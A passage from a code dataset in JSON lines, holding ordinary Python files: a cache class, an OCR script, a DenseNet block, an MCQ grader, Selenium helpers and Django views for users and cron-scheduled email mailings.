super().__init__()\n self.MRU = None\n\n def put(self, key, item):\n \"\"\"\n Adds a new item\n to the cache\n using MRU algorithm\n \"\"\"\n if key is not None and item is not None:\n if key not in self.cache_data.keys() and len(\n self.cache_data) >= MRUCache.MAX_ITEMS:\n print(\"DISCARD: {}\".format(self.MRU))\n del self.cache_data[self.MRU]\n\n self.cache_data[key] = item\n self.MRU = key\n\n def get(self, key):\n \"\"\"\n Gets an item\n stored in the cache\n \"\"\"\n if key in self.cache_data.keys():\n self.MRU = key\n return self.cache_data.get(key)\n","repo_name":"DudeGFA/alx-backend","sub_path":"0x01-caching/4-mru_cache.py","file_name":"4-mru_cache.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4252156871","text":"\n\ndef python_cos(q_vec, b_vec):\n \"\"\"\n 计算余弦相似度\n :param q_vec: 一维数组\n :param b_vec: 一维数组\n :return:\n \"\"\"\n dot_q_b = 0\n q_vec_length = 0\n b_vec_length = 0\n for q, b in zip(q_vec, b_vec):\n dot_q_b += q * b\n q_vec_length += q * q\n b_vec_length += b * b\n length = (q_vec_length ** (1 / 2)) * (b_vec_length ** (1 / 2))\n cos_sim = dot_q_b / length # 向量的内积除以向量模长的积\n # print('cos_sim', cos_sim)\n return cos_sim\n\n","repo_name":"1214Yuki/PosterGenerate","sub_path":"match/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34490236975","text":"import cv2\nimport numpy as np\nimport sys\nfrom os import path\nfrom . import Config as CFG\nfrom .ImageProcess import ImagePreprocessor\nfrom .Extractor import Extractor\nfrom .OCR import DigitOCR\n\n\nclass MeterOCR:\n def __init__(self, image, folder='.', debug=False):\n self.folder=folder\n self.imgName=image\n self.filename=path.join(self.folder, self.imgName)\n self.debug=debug\n\n def loadImage(self, fileName):\n img=cv2.imread(fileName)\n if img is None:\n exit(\"Invalid image\")\n if self.debug:\n print(\"Image shape: {}\".format(img.shape))\n return img\n\n def process(self):\n self.image = self.loadImage(self.filename)\n preprocess = ImagePreprocessor(self.image, self.folder, debug=True)\n extractor = Extractor(preprocess.image, self.folder, debug=True)\n extractor.process()\n ocr = DigitOCR()\n ocr.train()\n res = ocr.identify(extractor.digits)\n return res\n\nif __name__==\"__main__\":\n mocr = MeterOCR(sys.argv[1])\n res = mocr.process()\n print(res)\n","repo_name":"gturta/meter-ocr","sub_path":"server/lib/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2985209838","text":"#!/usr/bin/env python3\n\n\"\"\"Useless comment\"\"\"\nimport tensorflow.keras as K\n\n\ndef dense_block(X, nb_filters, growth_rate, layers):\n \"\"\"\n Create the dense block of the DenseNet-b\n :param X: The output of the previous layer\n :param nb_filters: The number of filter from the previous\n :param growth_rate: The growth rate\n :param layers: The number of layer in the dense block\n :return: The dense block module\n \"\"\"\n init = K.initializers.he_normal()\n input_data = X\n for _ in range(layers):\n norm = K.layers.BatchNormalization()(input_data)\n act = K.layers.ReLU()(norm)\n conv_1x1 = K.layers.Conv2D(filters=4 * growth_rate,\n kernel_size=(1, 1),\n kernel_initializer=init)(act)\n norm = K.layers.BatchNormalization()(conv_1x1)\n act = K.layers.ReLU()(norm)\n conv_3x3 = K.layers.Conv2D(filters=growth_rate,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding=\"same\",\n kernel_initializer=init)(act)\n input_data = K.layers.Concatenate()([input_data, conv_3x3])\n\n return input_data, (growth_rate * layers) + nb_filters\n","repo_name":"Camaltra/holbertonschool-machine_learning","sub_path":"supervised_learning/deep_cnns/5-dense_block.py","file_name":"5-dense_block.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73029210385","text":"import openpyxl\nfrom Tkinter import *\nimport string\n\ndef onsubmit(event):\n mark_register ={}\n filename = txtbox_filename.get()\n filevalidateflag = validatefilename(filename)\n if (filevalidateflag):\n wb = openpyxl.load_workbook(filename)\n master_key = []\n stringbuffer = \"\"\n mark = 0\n noofquestions = txtbox_noofquestions.get()\n numbervalidateflag = validatenumber(noofquestions)\n if (not(numbervalidateflag)):\n noofquestions = 0\n else:\n noofquestions = int(noofquestions)\n sheets = wb.sheetnames\n if (\"answerkey\" in sheets):\n keysheet = wb[\"answerkey\"]\n for i in range(1,noofquestions+1):\n stringbuffer = stringbuffer + str(keysheet[\"A\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"B\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"C\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"D\" + str(i)].value)\n master_key.append(stringbuffer)\n stringbuffer = \"\"\n \n\n for sheet in sheets:\n #print (sheet)\n if ((sheet != \"answerkey\") and (sheet != \"result\")):\n answersheet = wb[sheet]\n for i in range(1,noofquestions+1):\n stringbuffer = stringbuffer + str(answersheet[\"A\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"B\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"C\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"D\" + str(i)].value)\n if (stringbuffer == master_key[i-1]):\n mark = mark + 1\n stringbuffer = \"\"\n answersheet[\"F1\"].value = \"Total :\"\n answersheet[\"G1\"].value = mark\n #print (str(sheet)+ \":\" +str(mark))\n mark_register[sheet]=mark\n wb.save(filename)\n mark = 0\n\n if (\"result\" in sheets):\n print (\"result sheet is already available\")\n print (\"updating..........\")\n del wb[\"result\"]\n wb.create_sheet(\"result\")\n resultsheet = wb[\"result\"]\n index = 1\n for sheet in sheets:\n if ((sheet != \"answerkey\") and (sheet != \"result\")):\n resultsheet[\"A\" + str(index)].value = sheet\n resultsheet[\"B\" + str(index)].value = mark_register[sheet]\n index = index + 1\n \n wb.save(filename)\n print (\"done\")\ndef validatefilename(filename):\n if(filename != \"\"):\n if (type(filename)== str):\n if (\".xlsx\" in filename):\n return True\n else:\n print (\"extension is invalid\")\n return False\n else:\n print (\"filename should be string\")\n return False\n else:\n print (\"text box is empty\")\n return False\n \n \ndef validatenumber(number):\n checklist = list(string.ascii_lowercase)\n checklist+list(string.ascii_uppercase)\n checklist+list(string.punctuation)\n if(number != \"\"):\n flag = True\n for letter in checklist:\n if(letter in number):\n flag = False\n if (flag):\n flag = False\n for letter in range(10):\n if(str(letter) in number):\n flag = True\n if (flag):\n return True\n else:\n print (\"there is no number\")\n return False\n else:\n print (\"there should not any special character or alphabet\")\n return False\n else:\n print(\"text box is empty\")\n return False\n \nwindow = Tk()\nLabel(window , text=\"file name with extension\").grid(row=0 , sticky=W)\ntxtbox_filename = Entry(window, width=20)\ntxtbox_filename.grid(row=0,column=1, sticky=E)\nLabel(window , text=\"number of question\").grid(row=1 , sticky=W)\ntxtbox_noofquestions = Entry(window, width=20)\ntxtbox_noofquestions.grid(row=1,column=1, sticky=E)\nbutton = Button(window , text=\"submit\")\nbutton.grid(row=2,column=1, sticky=E)\nbutton.bind(\"\" , onsubmit)\nwindow.mainloop()\n \n \n","repo_name":"baarath9829/MCQ_Correcter","sub_path":"MCQ.py","file_name":"MCQ.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1701098065","text":"#Дані про температуру повітря за декаду листопада зберігаються в масиві.\n#Визначити, скільки разів температура опускалася нижче -10 градусів.\n#Павлюк Владислав\nimport numpy as np#импортируем библиотеку нампи\nimport random\nwhile True:\n b=np.zeros(10,dtype=int)#инициализируем масив нулями ,и присваиваем типу данных тип данных инт\n for i in range(10):#проходимся по елементам масива\n b[i] = random.randint(-20,10)\n print(b)\n count=0\n for k in range(10):#снова проходимся по нашей матрице\n if b[k]<-10: #если елементы меньше -10,счетчик +1\n count+=1\n if count==2 or count==3 or count==4:\n print('Опускалась',count,'раза')\n else:\n print('Опускалась',count,'раз')\n result = input('Хотите продолжить? Если да - 1, Если нет - інше: ')\n if result == '1':\n continue\n else:\n break\n","repo_name":"Vladislav1223/Colocvium","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17574822955","text":"# -- coding: utf-8 --\nimport time\nimport datetime\nimport unittest\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom buttons import *\nimport pyautogui\nimport pyautogui as pyautogui\nfrom change_status import *\nimport json\nimport requests\nfrom selenium.webdriver.common.keys import Keys\n\nclass Bets_constructor(object):\n # Ставки для торга(не забудь подождать после загрузки страницы!)\n\n # Заполнение поля цена в рублях (первая ставка)\n def price_bet1(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(\"2500\")\n\n # Заполнение поля цена в рублях (вторая ставка)\n def price_bet2(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(\"2000\")\n\n # Заполнение поля цена в рублях (первая ставка переторжка)\n def price_bet1_resell(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(\"1500\")\n\n # Заполнение поля цена в рублях (вторая ставка переторжка)\n def price_bet2_resell(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(\"1000\")\n\n # Заполнение поля цена в процентах (первая ставка)\n def price_bet1_persent(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(u'\\ue009' + u'\\ue003')\n Price.send_keys(\"10\")\n\n # Заполнение поля цена в процентах (вторая ставка)\n def price_bet2_persent(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(u'\\ue009' + u'\\ue003')\n Price.send_keys(\"20\")\n\n # Заполнение поля цена в процентах (первая ставка переторжка)\n def price_bet1_persent_resell(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(u'\\ue009' + u'\\ue003')\n Price.send_keys(\"25\")\n\n # Заполнение поля цена в процентах (вторая ставка переторжка)\n def price_bet2_persent_resell(self, driver):\n Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n Price.send_keys(u'\\ue009' + u'\\ue003')\n Price.send_keys(\"30\")\n\n #Заполнение поля комментарий\n def сomment_bet(self, driver):\n time.sleep(5)\n Comment = driver.find_element(By.CSS_SELECTOR, '[id=comment][name=comment]')\n Comment.send_keys(\"Автотест\")\n\n # Добавление файла в ставку\n def add_file_bet(self, driver):\n time.sleep(2)\n pyautogui.write(r'C:\\Users\\Saya\\Desktop\\form.xlsx')\n time.sleep(1)\n pyautogui.press('enter')\n\n #Модальное окно подтверждения при первой ставке\n def modal_window_first_bet(self, driver):\n driver.find_element(By.CSS_SELECTOR, 'div#root span.ant-checkbox > input').click()\n SMS_code = driver.find_element(By.CSS_SELECTOR, 'input#sms_code')\n SMS_code.send_keys(\"9999\")\n driver.find_element(By.CSS_SELECTOR, 'div#root div.reveal_form > button[type=\"button\"]').click()\n\n # Модальное окно подтверждения при первой ставке\n def modal_window_second_bet(self, driver):\n SMS_code = driver.find_element(By.CSS_SELECTOR, 'input#sms_code')\n SMS_code.send_keys(\"9999\")\n driver.find_element(By.CSS_SELECTOR, 'div#root div.reveal_form > button[type=\"button\"]').click()\n\n","repo_name":"Luda-Glazova/Autotests","sub_path":"bets_constructor.py","file_name":"bets_constructor.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7813590298","text":"from django.http.response import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm\nfrom users.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom api import views as api\nfrom api import urls as calls\nfrom api import serializers as ser\nfrom home.views import home_redirect\nfrom .forms import UserRegisterForm\nimport json\n\n\ndef register(request):\n register_form = UserRegisterForm()\n if request.method == 'POST':\n response = api.create_users(request)\n if response.status_code != 400:\n messages.success(request, f'Account created for {response.data[\"username\"]}')\n return redirect(\"/login\")\n else:\n error_message = \"\"\n for val in response.data:\n error_message += val\n return render(request, 'users/register.html', {'register_form': register_form, 'error_message': error_message})\n return render(request, 'users/register.html', {'register_form': register_form})\n\ndef login(request):\n login_form = AuthenticationForm()\n if request.method == 'POST':\n response = api.login(request)\n if response.status_code != 400:\n request.session['user_id'] = response.data['id']\n messages.success(request, f'Welcome back {response.data[\"username\"]}!')\n return redirect(\"/items\")\n else:\n error_message = \"\"\n for val in response.data:\n error_message += val\n return render(request, 'users/login.html', {'login_form': login_form, 'error_message': error_message}) \n return render(request, 'users/login.html', {'login_form': login_form})\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n update_form = UserUpdateForm(request.POST, instance=request.user)\n\n if update_form.is_valid:\n update_form.save()\n messages.info(request, f'Your account has been updated!')\n return redirect('update')\n else:\n update_form = UserUpdateForm(instance=request.user)\n\n context = {\n 'update_form': update_form\n }\n \n return render(request, 'users/update.html', context)\n\ndef account(request):\n if 'user_id' not in request.session:\n return redirect (\"/login\")\n user_id = request.session['user_id']\n \n if request.method==\"POST\":\n if 'delete_acc' in request.POST:\n request.method = 'DELETE'\n request.META['REQUEST_METHOD'] = 'DELETE'\n\n #call api to delete user where user.id == user_id\n response = api.delete_user(request, user_id)\n if response.status_code != 400:\n del request.session['user_id'] # delete session\n messages.success(request, f'Account Deleted, see you space cowboy')\n return redirect('/')\n else:\n messages.error(request, f'Account couldn\\'t be deleted, better luck next time!')\n return redirect('/')\n if 'log_out' in request.POST:\n \n del request.session['user_id'] #deleting session\n messages.success(request, f'You have been logged out')\n return redirect('/')\n else:\n response = api.view_user(request, user_id)\n return render(request, 'users/accountDetails.html', response.data)","repo_name":"cookiewho/CST438_Project2_GroupE","sub_path":"wishlist/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11811772332","text":"import os\nfrom smtplib import SMTPException\nfrom django.core.mail import send_mail\nfrom django.core.paginator import Paginator\nfrom django.utils import timezone\nfrom django.contrib.auth import logout, login\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.auth.views import LoginView, PasswordChangeView\nfrom django.shortcuts import redirect, render\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.views import View\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView, FormView, TemplateView\nfrom config import settings\nfrom sender.forms import *\nfrom django.http import HttpResponseRedirect\nfrom sender.models import*\nfrom sender.utils import custom_send_mail, translit\nfrom django.contrib.auth.tokens import default_token_generator as token_gen\nfrom sender.utils.cache import cache_home_posts, cache_blog\n\nweekdays_cron_dict = {\n 'понедельник': '1', 'вторник': '2', 'среда': '3', 'четверг': '4',\n 'пятница': '5', 'суббота': '6', 'воскресенье': '0'\n}\n\n\ndef include_static_context():\n context = {}\n context['status_mailing_done'] = ConfigMailing.STATUS_DONE\n context['status_mailing_started'] = ConfigMailing.STATUS_STARTED\n context['status_mailing_moderating'] = ConfigMailing.STATUS_MODERATING\n context['period_mailing_month'] = ConfigMailing.PERIOD_MONTH\n context['period_mailing_week'] = ConfigMailing.PERIOD_WEEK\n context['status_letter_sent'] = LetterMailing.STATUS_SENT\n context['status_letter_wait'] = LetterMailing.STATUS_WAIT\n context['periods'] = ConfigMailing.PERIODS_TUPLE\n context['hours'] = [x for x in range(0, 24)]\n context['minutes'] = [x for x in range(0, 60)]\n context['ban_mailing_true'] = ConfigMailing.BANNED_TRUE\n context['ban_mailing_false'] = ConfigMailing.BANNED_FALSE\n context['ban_user_true'] = User.BANNED_TRUE\n context['ban_user_false'] = User.BANNED_FALSE\n\n return context\n\ndef redirect_to_main_page(user):\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return reverse_lazy('sender:moderating_mailings')\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return reverse_lazy('sender:moderating_users')\n\n if user.has_perm('sender.content_management'):\n return reverse_lazy('sender:content_management_posts')\n\n return reverse_lazy('sender:profile')\n\n\nclass ConfigMailingDetailView(DetailView):\n '''\n Экземпляр данного класса служит прокси-объектом для передачи динамического и статического\n контекста нескольким другим контроллерам, также основанным на модели ConfigMailing\n '''\n model = ConfigMailing\n template_name = 'sender/mailing_detail_user.html'\n\n def include_user_and_static_context(self, obj, user):\n context = {}\n context['trials'] = TryMailing.objects.all().filter(user=user, mailing=obj)\n context['letters'] = LetterMailing.objects.all().filter(user=user, mailing=obj).order_by('position')\n context['sent_letters_count'] = LetterMailing.objects.all().filter(user=user, mailing=obj, status=LetterMailing.STATUS_SENT).count()\n context.update(include_static_context())\n\n return context\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n'''прокси объект'''\nproxy_mailing_detail = ConfigMailingDetailView()\n\n\nclass RegisterUser(CreateView):\n form_class = RegisterUserForm\n template_name = 'sender/forms/registration.html'\n s = 'sender'\n get_perm = Permission.objects.get_by_natural_key\n\n user_permissions = [\n {'app': s, 'act': 'add_configmailing', 'mod': 'configmailing'}, {'app': s, 'act': 'change_configmailing', 'mod': 'configmailing'},\n {'app': s, 'act': 'view_configmailing', 'mod': 'configmailing'}, {'app': s, 'act': 'delete_configmailing', 'mod': 'configmailing'},\n {'app': s, 'act': 'add_lettermailing', 'mod': 'lettermailing'}, {'app': s, 'act': 'change_lettermailing', 'mod': 'lettermailing'},\n {'app': s, 'act': 'delete_lettermailing', 'mod': 'lettermailing'}, {'app': s, 'act': 'view_lettermailing', 'mod': 'lettermailing'},\n ]\n def get(self, request, *args, **kwargs):\n super().get(self, request, *args, **kwargs)\n\n if self.request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(self.get_context_data())\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n\n if form.is_valid():\n form.save()\n email = form.cleaned_data.get('email')\n password = form.cleaned_data.get('password1')\n user = authenticate(email=email, password=password)\n\n try:\n custom_send_mail.verify(request, user)\n\n for perm in self.user_permissions:\n user.user_permissions.add(self.get_perm(codename=perm['act'], app_label=perm['app'], model=perm['mod']).pk)\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> register_errors.txt')\n\n return redirect('sender:some_error')\n\n else:\n return redirect('sender:confirm_email')\n\n context = {'form': form}\n\n return render(request, self.template_name, context)\n\n\nclass ConfirmEmailTemplateView(TemplateView):\n template_name = 'sender/service/confirm_email.html'\n\n def get(self, request, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(context)\n\n\nclass EmailVerifyView(View):\n\n def get(self, request, uidb64, token):\n user = self.get_user(uidb64)\n\n if user is not None and token_gen.check_token(user, token):\n user.email_verify = True\n user.save()\n login(request, user)\n\n return redirect('sender:profile')\n\n return redirect('sender:invalid_verify')\n\n @staticmethod\n def get_user(uidb64):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User.objects.get(pk=uid)\n\n except (TypeError, ValueError, OverflowError, User.DoesNotExist, ValidationError):\n user = None\n\n return user\n\n\nclass LoginUser(LoginView):\n form_class = CustomAuthenticationForm\n template_name = 'sender/forms/login.html'\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n user = self.request.user\n\n if user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(self.get_context_data())\n\n\ndef logout_user(request):\n logout(request)\n return redirect('sender:login')\n\n\nclass ListAndCreateConfigMailing(CreateView):\n model = ConfigMailing\n fields = ('title', 'hour', 'minute', 'periodicity', 'mail_dump')\n template_name = 'sender/mailing_list_user.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n self.object.user = user\n self.object.save()\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"object_list\"] = self.model.objects.all().filter(user=self.request.user.pk).order_by('-create_at')\n context['user'] = self.request.user\n context.update(include_static_context())\n\n return context\n\n\nclass ConfigMailingCreateViewMobile(CreateView):\n '''Для обработки операций создания рассылки со смартфонов и планшетов'''\n model = ConfigMailing\n template_name = 'sender/mailing_create_for_mobile.html'\n fields = ('title', 'from_email', 'hour', 'minute', 'periodicity', 'mail_dump')\n success_url = reverse_lazy('sender:profile')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n self.object.user = user\n self.object.save()\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n\nclass ConfigMailingUpdateView(UpdateView):\n model = ConfigMailing\n fields = ('title', 'from_email', 'hour', 'minute', 'periodicity', 'mail_dump')\n template_name = 'sender/mailing_update.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n if self.object.periodicity == self.model.PERIOD_WEEK:\n if self.object.weekdays:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * {self.object.weekdays} '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n if self.object.periodicity == self.model.PERIOD_MONTH:\n if self.object.monthdates:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} {self.object.monthdates} * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass UpdatePasswordConfigMailingDetailView(UpdateView):\n model = ConfigMailing\n form_class = PasswordFromEmailForm\n template_name = 'sender/mailing_change_password.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n def form_valid(self, form):\n new_password1 = form.data['password_from_email']\n new_password2 = form.data['new_password2']\n\n if new_password1 != new_password2:\n form.add_error('password_from_email', 'Пароли не совпадают')\n return super().render_to_response(self.get_context_data(form=form))\n\n try:\n send_mail(\n subject='''Пользователь сменил пароль от почты.''',\n message=f'''Тестовое письмо при смене пароля пользователя''',\n from_email=settings.EMAIL_HOST_USER,\n auth_password=new_password1,\n recipient_list=[Home.objects.all().first().test_email, ]\n )\n except SMTPException as e:\n form.add_error('password_from_email', 'Пароль от указанной в рассылке почты не подходит')\n return super().render_to_response(self.get_context_data(form=form))\n\n else:\n self.object.password_from_email = new_password1\n self.object.save()\n\n return redirect('sender:profile')\n\n\nclass ConfigMailingModeratingListView(ListView):\n model = ConfigMailing\n template_name = 'sender/mailing_list_moderating.html'\n ordering = '-create_at'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['all_mailings'] = True\n context.update(include_static_context())\n\n return context\n\n\nclass ConfigMailingModeratingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_detail_moderating.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.get_object().user))\n\n return context\n\n\nclass WeekdayUpdateConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_update_weekday.html'\n form = UpdateWeekdayForm()\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def post(self, form, pk):\n mailing = ConfigMailing.objects.all().get(id=pk)\n\n weekdays = []\n weekdays_text = []\n for val in weekdays_cron_dict:\n try:\n form.POST[val]\n except Exception:\n continue\n else:\n weekdays.append(weekdays_cron_dict[val])\n weekdays_text.append(val)\n\n mailing.weekdays = ','.join(weekdays)\n mailing.weekdays_text = ', '.join(weekdays_text)\n mailing.save()\n\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {mailing.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if mailing.weekdays:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{mailing.minute} {mailing.hour} * * {mailing.weekdays} '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return self.get_success_url()\n\n def get_success_url(self):\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass MonthdateUpdateConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_update_monthdate.html'\n form = UpdateMonthdateForm()\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def post(self, form, pk):\n mailing = ConfigMailing.objects.all().get(id=pk)\n\n monthdates = []\n for val in range(1, 32):\n try:\n form.POST[f'{val}']\n except Exception:\n continue\n else:\n monthdates.append(str(val))\n\n mailing.monthdates = ','.join(monthdates)\n mailing.monthdates_text = mailing.monthdates.replace(',', ', ')\n 